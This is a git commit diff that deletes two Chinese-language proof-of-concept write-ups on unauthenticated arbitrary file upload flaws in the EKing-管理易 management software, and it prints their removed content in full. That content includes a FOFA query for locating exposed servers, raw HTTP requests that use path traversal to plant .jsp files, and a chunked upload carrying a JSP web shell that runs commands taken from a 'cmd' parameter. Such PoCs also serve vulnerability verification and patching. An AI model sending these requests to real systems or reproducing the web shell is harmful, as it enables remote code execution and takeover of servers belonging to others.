Delete wpoc/eking管理易 directory

2025-06-20 09:51:11 +00:00 · 2025-04-25 10:27:04 +08:00 · 2025-04-25 10:27:04 +08:00 · 5ba377ef60
commit 5ba377ef60
parent 7977d5e743
2 changed files with 0 additions and 96 deletions
--- a/wpoc/eking管理易/eking管理易FileUpload接口存在任意文件上传漏洞.md
+++ b/wpoc/eking管理易/eking管理易FileUpload接口存在任意文件上传漏洞.md
@ -1,28 +0,0 @@
-# eking管理易FileUpload接口存在任意文件上传漏洞
-
-EKing-管理易 FileUpload.ihtm 接口处存在文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传任意文件，在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
-
-## fofa
-
-```yaml
-app="EKing-管理易"
-```
-
-## poc
-
-```yaml
-POST /app/FileUpload.ihtm?comm_type=EKING&file_name=../../rce.jsp. HTTP/1.1
-Host: 
-User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
-Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6
-
--WebKitFormBoundaryHHaZAYecVOf5sfa6
-Content-Disposition: form-data; name="uplo_file"; filename="rce.jpg"
-
-<% out.println("hello");%>
--WebKitFormBoundaryHHaZAYecVOf5sfa6--
-```
-
-![d6195b5041564ca4bb7b6ae0a4437513.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407301642889.png)
-
-![25f79982d40949828bd29e1d81404123.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407301643141.png)
--- a/wpoc/eking管理易/eking管理易Html5Upload接口存在任意文件上传漏洞.md
+++ b/wpoc/eking管理易/eking管理易Html5Upload接口存在任意文件上传漏洞.md
@ -1,68 +0,0 @@
-# eking管理易Html5Upload接口存在任意文件上传漏洞
-
-eking管理易Html5Upload接口存在任意文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传任意文件，在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
-
-## fofa
-
-```yaml
-app="EKing-管理易"
-```
-
-## poc
-
-创建临时文件
-
-```yaml
-POST /Html5Upload.ihtm HTTP/1.1
-Host: 
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
-Content-Type: application/x-www-form-urlencoded
-Connection: close
-
-comm_type=INIT&sign_id=shell&vp_type=default&file_name=../../shell.jsp&file_size=2048
-```
-
-写入文件内容
-
-```jinja2
-POST /Html5Upload.ihtm HTTP/1.1
-Host: 
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
-Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
-Connection: close
-
------WebKitFormBoundaryj7OlOPiiukkdktZR
-Content-Disposition: form-data; name="comm_type"
-
-DATA
------WebKitFormBoundaryj7OlOPiiukkdktZR
-Content-Disposition: form-data; name="sign_id"
-
-shell
------WebKitFormBoundaryj7OlOPiiukkdktZR
-Content-Disposition: form-data; name="data_inde"
-
-0
------WebKitFormBoundaryj7OlOPiiukkdktZR
-Content-Disposition: form-data; name="data"; filename="chunk1"
-Content-Type: application/octet-stream
-
-<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundaryj7OlOPiiukkdktZR--
-```
-
-保存文件
-
-```javascript
-POST /Html5Upload.ihtm HTTP/1.1
-Host: 
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
-Content-Type: application/x-www-form-urlencoded
-Connection: close
-
-comm_type=END&sign_id=shell&file_name=../../shell.jsp
-```
-
-![image-20241012132747292](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121327356.png)
-
-![image-20241012132754554](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121327613.png)